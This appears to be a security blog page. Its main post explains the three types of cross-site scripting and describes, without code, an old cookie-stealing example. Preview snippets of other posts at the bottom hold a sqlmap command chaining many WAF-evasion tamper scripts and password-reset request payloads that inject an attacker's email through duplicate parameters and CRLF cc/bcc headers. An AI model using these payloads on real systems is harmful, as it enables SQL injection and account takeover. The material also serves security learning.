Different types of cross-site scripting attacks

Stored (persistent) XSS

Stored or persistent XSS attacks occur when the malicious scripts are permanently stored on the targeted server(s); this can occur in a database, on a message board, in comment fields, or on other user input pages. Victims receive a malicious script when the information is requested from the server.

Reflected XSS

A reflected attack occurs when the malicious script is not contained on the server but is included in the input sent to the server. Errors messages and search results are two commonly used vectors.
These attacks are often delivered to the target via an email or on another site, often by tricking the target into choosing a link containing the malicious script or through user submitting the malicious form. The malicious code then reflects to the user's browser. This reflection causes the browser to believe that the script is trustworthy and prompts the browser to execute the script.

DOM based attacks

There is a third type of attack, known as a DOM-based attack, which is not common but can occur. The document object model, or DOM, is the application programming interface (API) used for valid HTML and XML documents. A DOM-based attack occurs when the DOM environment is modified in the target's web browser. This modification causes the client-side code to run in unexpected ways.
DOM-based attacks are different in that they do not exploit the flaws in the server-side code, instead of relying on the client-side scripts.

Cross-site scripting attacks (XSS) examples

Although this example is an old one, it shows the simplicity of executing an XSS attack on a target. The image above shows how an attacker implements a malicious script to extract the user's cookie data, including the user ID and password from the browser. There's also an HTML image tag being used to provide this information to the attacker through a monitor file on his server.
(Image source: https://www.cse.wustl.edu/~jain/cse571-07/ftp/xsscript/index.html)
The image above shows a message once it is posted on the message board and gives a user private cookie data to the attacker due to the operation of the malicious script. This example is simple and easy to identify as a malicious attack, but there are ways to enhance these attacks and hide the malicious actions from target users.

Comments

Post a Comment

Popular posts from this blog

SQLMAP Tamper Scripts WAF bypass

Use and load all tamper scripts to evade filters and WAF: sqlmap -u ‘ http://www.site.com/search.cmd?form_state=1 ’ — level=5 — risk=3 -p ‘item1’ — tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords General Tamper testing: tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus...
Read more

Account Takeover: Password Reset With Manipulating Email Parameter

 Exploitation Add attacker email as second parameter using & 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com & email = attacker@email . com Copied! Add attacker email as second parameter using %20 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com % 20 email = attacker@email . com Copied! Add attacker email as second parameter using | 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com | email = attacker@email . com Copied! Add attacker email as second parameter using cc 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld%0a%0dcc:attacker@mail.tld" Copied! Add attacker email as second parameter using bcc 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld%0a%0dbcc:attacker@mail.tld" Copied! Add attacker email as second parameter using , 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld" , email = "attacker@mail.tld" Copied! Add attacker email as second parameter in json ar...
Read more